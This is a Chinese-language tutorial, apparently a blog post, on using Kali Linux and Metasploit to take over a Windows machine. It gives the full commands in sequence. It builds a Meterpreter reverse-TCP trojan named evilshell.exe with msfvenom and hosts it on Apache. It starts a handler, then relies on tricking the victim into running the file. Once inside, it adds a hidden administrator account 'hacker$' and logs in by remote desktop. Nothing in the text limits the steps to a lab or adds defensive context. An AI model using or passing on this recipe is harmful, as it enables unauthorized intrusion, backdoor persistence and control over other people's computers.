一、概念:Kali基於debin的數字取證系統,上面集成了很多滲透測試工具,其前身是BT5 R3(BtackTrack)。
其中Metasploit是一個綜合利用工具,極大的提高了攻擊者的滲透效率,使用Ruby開發的,使用非常方便,進入該工具的方式:msfconsole ,MSF依賴於Postgresql數據庫,在使用MSF之前要開啟數據庫。
二、步驟:
Step1:生成木馬,msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=Kali的IP lport=5555 -f exe >/root/Desktop/evilshell.exe
-p 參數后跟上payload,攻擊成功后要做什么事情
lhost 后跟監聽的IP
lpost 后跟監聽端口
-f 后跟要生成后門文件的類型
>重定向
Step2:將生成的木馬文件evilshell.exe 拷貝到/var/www/html,開啟apache服務,在肉雞上打開瀏覽器,訪問該站點(Kali的IP),下載木馬文件。
cp evilshell.exe /var/www/html/
service apache2 start
Step3:開啟MSF,提前查看postgresql運行狀態 msfconsole
ps -aux |grep postgresql
msfconsole
exploits:開發利用,用來攻擊某些服務、平台、系統等用到的工具
payload:載荷載體,攻擊成功后要操作什么
輸入以下命令
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp(選擇木馬時選的payload) msf5 exploit(multi/handler) > show options msf5 exploit(multi/handler) > set lhost kali的IP msf5 exploit(multi/handler) > set lpost 5555 msf5 exploit(multi/handler) > run(或者exploit)
Step4:在肉雞中誘導用戶點擊exe程序(社會工程學攻擊),在Kali中就會得到肉雞的shell(meterpreter)
msf5 exploit(multi/handler) > run
Step5:現在就可以給肉雞添加用戶了
net user net user hacker$ /add net user hacker$ 123.com net localgroup administrators hacker$ /add 添加到管理員組 net user hacker$
Step6:遠程登錄肉雞計算機
rdesktop + windows的IP
至此,使用Kali控制Windows成功!